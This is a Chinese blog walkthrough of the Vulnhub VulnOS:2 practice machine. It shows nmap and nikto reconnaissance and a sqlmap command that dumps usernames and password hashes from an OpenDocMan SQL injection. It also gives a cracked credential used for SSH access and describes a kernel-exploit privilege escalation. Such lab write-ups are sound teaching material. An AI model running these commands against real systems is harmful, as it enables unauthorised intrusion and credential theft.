首页 > 其他分享 >Vulnhub-Vulnos:2-WP

Vulnhub-Vulnos:2-WP

时间:2023-12-26 14:13:47浏览次数:34  
标签:Vulnos nmap 192.168 漏洞 Vulnhub WP -- 靶机 56.104

Vulnhub-Vulnos:2

前言

靶机地址:VulnOS: 2 ~ VulnHub

靶机下载地址:https://download.vulnhub.com/vulnos/VulnOSv2.7z

攻击机:kali linux

靶机描述:
image

信息收集

主机发现

nmap -sn 192.168.56.0/24
image

靶机地址为192.168.56.104

端口扫描

sudo nmap -p- 192.168.56.104
image

详细信息扫描

sudo nmap -p22,80,6667 -A 192.168.56.104
image

漏洞扫描

nmap

sudo nmap -p22,80,6667 --script=vuln 192.168.56.104

image

image

nikto

nikto -h 192.168.56.104
image

web信息收集

网站首页
image

可以看到有一个website,点击进入
image

这里进入到一个新的页面,随便点点发现有提示,这里背景色全部都是黑色的所以说进入一个新页面全选看看。
image

这里发现了目录地址/jabcd0cs/以及账号密码:guest/guest
image

image

发现了网站版本,OpenDocMan v1.2.7,在漏洞库中搜索相关漏洞
image

只有一个我们复制到当前文件夹下面
image

这里发现一个sql注入漏洞,有点类似我们之前漏洞扫描出来的sql注入,不过当时没有细看。
image

立足点

sql注入漏洞

那就直接用sqlmap开始梭哈

sqlmap -u "http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --level=3 -risk=3 -D jabcd0cs -T odm_user -C id,username,password --dump --batch
image

webmin | b78aae356709f8c31118ea613980954b

对密码进行md5破解MD5免费在线解密破解_MD5在线加密-SOMD5

密码:webmin1980

使用ssh登录服务器
image

成功登录服务器,在服务器上翻了一下并未发现flag,那就继续进行提权吧。

提权

首先尝试sudo -l查看有root权限的文件,发现并不行,查看内核版本搜索内核相关漏洞
image

发现版本为3.13.0
image

搜索漏洞库,发现一个符合版本的本地提权
image

我们复制到当前文件夹下
image

本地用python3启动一个web服务,靶机用wget进行下载
image

编译执行该文件
image

成功拿到root权限

查看一下flag
image

Hello and welcome.
You successfully compromised the company "JABC" and the server completely !!
Congratulations !!!
Hope you enjoyed it.

What do you think of A.I.?

标签:Vulnos,nmap,192.168,漏洞,Vulnhub,WP,--,靶机,56.104
From: https://www.cnblogs.com/zy4024/p/Vulnhub_Vulnos2_WP.html

相关文章

  • MoeCTF西电新生赛部分WP
    MoeCTF2023一.Misc1.Misc入门指北:bW9lY3Rme2hAdjNfZnVuX0B0X20xNWNfIX0=一看就知道是base64解码:moectf{h@v3_fun_@t_m15c_!}得到flag:moectf{h@v3_fun_@t_m15c_!}2.打不卡的图片1:把附件下载下来,发现没有文件名把他放在010editor里面查看一下他的十六进制:发现他的文件......
  • WPF Halcon机器视觉和运动控制软件通用框架,插件式开发,开箱即用 仅供学习!
    点我下载,仅供个人学习使用参考easyvision开发,集成几十个软件算子此版本以添加ui设计器。具体功能如上所示,可以自定义变量,写c#脚本,自定义流程,包含了halcon脚本和封装的算子,可自定义ui,通过插件形式开发很方便拓展自己的功能。......
  • ISCTF2023部分WP
    write-up:战队:来日方长赛道:进阶赛道队长:张伟文队员:结局别在遗憾Zn.WEB:圣杯战争!!!(题解:结局别说遗憾Zn.)解题思路:打开题目链接,代码如下:<?phphighlight_file(__FILE__);error_reporting(0);classartifact{public$excalibuer;public$arrow;publicfunction_......
  • 2023"安洵杯"第六届网络安全挑战赛-Misc WP
    dacongのsecret题目我的解答:题目给出一张png图片和一个加密压缩包,压缩包里面还存在另一张jpg图片看名字就知道是盲水印。由于压缩包里的图片提不出来,因此是单图盲水印,我们使用工具得密码d@C0ng1scUt3!!!解压得到另一张图片,010分析一下得到一串字符一眼丁真压缩包逆过......
  • wpf + MaterialDesign + Prism8 + DataGrid 实现表格数据+分页
    十年河东,十年河西,莫欺少年穷学完止境,精益求精1、不分页,带有排序功能(每个字段都可以排序) xaml如下:<UserControlx:Class="WpfApp.UserControls.UserView"xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"xmlns:x="http:......
  • 2023安洵杯第六届网络安全挑战赛 WP
    webai_java首先通过附件帐号信件获取到帐号通过base64或者jsfuck可获取提示js和c,审计一下js那么可以看到c函数,运行一下。获取到github项目地址查找提交历史我们发现了源码审计源码发现为可能存在spring–boot未授权绕过在admin的页面下的/post_message/接口存在fastjson解析......
  • 深入理解WPF中的Dispatcher:优化UI操作的关键
     概述:Dispatcher是WPF中用于协调UI线程和非UI线程操作的关键类,通过消息循环机制确保UI元素的安全更新。常见用途包括异步任务中的UI更新和定时器操作。在实践中,需注意避免UI线程阻塞、死锁,并使用CheckAccess方法确保在正确的线程上执行操作。这有助于提升应用程序的性能和用户......
  • 使用MVVM Toolkit简化WPF开发
    最近.NET8的WPF推出了 WPFFileDialog改进,这样无需再引用 Win32 命名空间就可以实现文件夹的选择与存储了,算是一个很方便的改进了。顺手写了一个小的WPF程序,在使用 Model-View-ViewModel(MVVM) 模式的时候,我不想使用 Prism 等重量级的框架,找了一个轻量级的MVVMCo......
  • 循序渐进介绍基于CommunityToolkit.Mvvm 和HandyControl的WPF应用端开发
    https://www.cnblogs.com/wuhuacong/tag/WPF/ 在我们的SqlSugar的开发框架中,整合了Winform端、Vue3+ElementPlus的前端、以及基于UniApp+Vue+ThorUI的移动前端几个前端处理,基本上覆盖了我们日常的应用模式了,本篇随笔进一步介绍前端应用的领域,研究集成WPF的应用端,循序渐进介绍基......
  • WPF MvvmToolkit入门
    最新.net6wpfMVVMToolkit8.0工程搭建。MVVMToolkit是一个轻量级MVVM框架,在框架下我们第一个要做的就是搞清在此框架下的一些常规操作:属性绑定和通知,命令绑定,消息传递。搞懂这些处理流程,然后就可以写自己业务的逻辑。1.安装mvvmtoolkit1.1Nuget下载CommunityToolkit.Mvvm......